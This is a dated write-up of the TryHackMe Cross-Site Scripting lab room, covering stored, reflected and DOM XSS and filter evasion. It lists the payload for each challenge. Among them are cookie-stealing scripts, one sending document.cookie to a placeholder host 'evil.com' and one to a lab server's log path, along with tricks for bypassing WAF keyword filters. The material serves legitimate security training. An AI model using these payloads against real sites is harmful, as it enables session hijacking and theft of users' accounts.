Mar 17, 2021
TryHackMe: Cross-Site Scripting
Cross-Site Scripting (XSS)
XSS is a vulnerability typically found in web applications that allows un-sanitized user inputs in the form of HTML Tags, JavaScript, VBScript, Flash and CSS.
Stored / Persistent XSS
Stored / Persistent XSS is the most dangerous type of XSS where the malicious code is originated from the website’s database.
#1 Add a comment and see if you can insert some of your own HTML.
<a href=”www.google.com”> Click on this link </a>#2 Add a comment using JavaScript to create an alert popup box that shows your document cookies.
<script>alert(document.cookie)</script>#3 Change “XSS Playground” to “I am a hacker” by adding comments and using Javascript.
Now, we know that the web application allows you to run JavaScript, you can then use JavaScript to change “XSS Playground” to “I am a hacker”.
- To do this, we need to find out the HTML tag associated with the title “XSS Playground”.
- Open your “Web Console” → Click on “Inspector” → Click on the “XSS Playground” in the browser.
- Under “Inspector”, you should see a highlighted section → Search for “XSS Background” → You should see that “XSS Playground” is assigned to <span id = “thm-title”>.
- Go to the “Web Console” → Click on “Console” → Run this JavaScript: document.querySelector(‘#thm-title’).textContent = “I am a hacker”.
- The JavaScript seems to be working → Now, go to the comment section and add your script → <script> document.querySelector(‘#thm-title’).textContent = ‘I am a hacker’ </script>.
<script> document.querySelector('#thm-title').textContent = 'I am a hacker' </script>
#4 Steal victim’s cookie by having the victim’s browser parses the malicious JavaScript code.
Typically, to steal someone’s cookies, you would need to inject a JavaScript code into the webpage so that every time when someone visits the webpage, it would get the value of the victim’s cookies and send the value of the cookies to your server. For example,
document.write(‘<img src=”https://yourserver.evil.com/collect.gif?cookie=' + document.cookie + ‘“ />’)In this case, TryHackMe has made things easier for us by creating a “logs page” that would log everything that is logged to “/log/xxx” URL.
For example, requesting /log/hello will log “hello” for us.
This means that if we post the JavaScript code below, we would be able to log everyone’s cookies.
<script>document.location='http://10.10.88.170/log'+document.cookie</script>
#5 Post a comment as Jack.
Reflected XSS
For reflected XSS to work, the attacker needs to trick the victim into clicking the URL that the attacker crafted.
#1 Craft a reflected XSS payload that will cause a popup saying “Hello”.
<script>alert("Hello")</script>
#2 Craft a reflected XSS payload that will cause a popup with your machines IP address.
<script>alert(window.location.hostname)</script>
DOM XSS
For DOM XSS, an attacker’s payload will only be executed until the website’s legitimate JavaScript code is executed. For example,
With Reflective XSS, the malicious payload will be injected directly on the website and get executed.
<html>
You searched for <em><script>...</script></em>
</html
With DOM-Based XSS, the malicious payload will only be executed when the vulnerable JavaScript code is called or interacted with.
var keyword = document.querySelector('#search')
keyword.innerHTML = <script>...</script>
#1 Look at the deployed machines DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.
- Type “asasas” into the search box.
- Go to your “Web Console” → Click on the “Network” section → Search for “asasas” and its associated page.
- You can see that the search is associated with http://10.10.234.78/dom page.
- Now, click on the “Debugger” section → Search for /dom page → Look for the script associated with “Image not found..”.
- You can see that the associated script is using <img src=>.
imgEl.innerHTML = ‘<img src=”’ + imgURL + ‘“ alt=”Image not found..” width=400>’
test" onmouseover="alert(document.cookie)" ORtest" onerror="alert(document.cookie)"
#2 Create an onhover event on an image tag, that change the background color of the website to red.
test" onmousehover="document.body.style.backgroundColor = 'red'"Filter Evasion
With WAF (Web Application Firewall), malicious XSS payloads can now be filtered so it is useful for us to known some of the bypass mechanisms for the common filtering done by WAF. For example,
<script>, alert() and etc.
#1 Bypass the filter that removes any script tags.
<img src="x" onerror="alert('Hello')">#2 The word alert is filtered, bypass it.
<img src="x" onerror="prompt('Hello')">#3 The word hello is filtered, bypass it.
This can be done by just playing some tricks with the word ‘Hello’. Since the word hello is filtered, it will deduct ‘Hello’ from this string ‘HHelloello’ and return ‘Hello’ to the user.
<img src="x" onerror="alert('HHelloello')">#4 Filtered in challenge 4 is as follows:
- word “Hello”
- script
- onerror
- onsubmit
- onload
- onmouseover
- onfocus
- onmouseout
- onkeypress
- onchange
Since this challenge only filters ‘onerror’, we can replace it with ‘ONERROR’ instead.
<img src="x" ONERROR="alert('HHelloello')">NOTE:
OWASP has also published a cheatsheet to evade XSS filter:
https://owasp.org/www-community/xss-filter-evasion-cheatsheet
